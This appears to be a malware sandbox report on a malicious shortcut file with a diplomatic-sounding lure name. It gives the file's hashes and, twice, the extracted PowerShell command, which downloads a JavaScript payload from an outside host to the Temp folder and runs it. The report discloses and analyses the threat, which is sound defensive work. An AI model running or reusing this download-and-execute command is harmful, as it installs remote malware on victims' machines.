Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
c73c308a137ff7805577042cc9e923e1
Sha1
6bfcddd912e6d87311eed5ae77fb53e1fdb5b184
Sha256
27d7a398a58c12093bc49f7144dac2f079232768096d0558c226ea5c53782e29
Sha384
3c02bcf6528f35a2c4abc5862ecd004d4618d0de82241e3b9cccb3f84bac631b0a5bef749bc39ada576710c86bc6d72b
Sha512
e5ad4ef0e9b03adb49349dd31bfce39f86e465eee86179c1bdddd419b2b36702388477b52e378643d8ca8297b390bfc301a9b1818f769a97829f84e189414bb2
SSDeep
1536:2QuaFPFizi08jxJ8e+OQh7YcrpoQMeiFSZsEhgBSwDnub7tISsQXHif:LF+ibxJ8bOceneSmUuCIif
TLSH
44530223ADB764B67C5159FB4FCC3C914D8D2582706727786038B8229F12A0B7D5A3BE
Artefacts
Name
Value
LNK: Command Execution

powershell.exe "cd $ENV:Temp;$f=$ENV:Temp+'\f.js';Invoke-WebRequest 'https://filebulldogs.com/uploads/82WX5GP8CI/f.js' -OutFile $f;./f.js;"

c73c308a137ff7805577042cc9e923e1 (65.74 KB)
No malware configuration were found at this point.
Artefacts
Name
Value Location
LNK: Command Execution

powershell.exe "cd $ENV:Temp;$f=$ENV:Temp+'\f.js';Invoke-WebRequest 'https://filebulldogs.com/uploads/82WX5GP8CI/f.js' -OutFile $f;./f.js;"

Malicious

c73c308a137ff7805577042cc9e923e1 > Algerian Ukrainian proposals for cooperation.lnk

You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙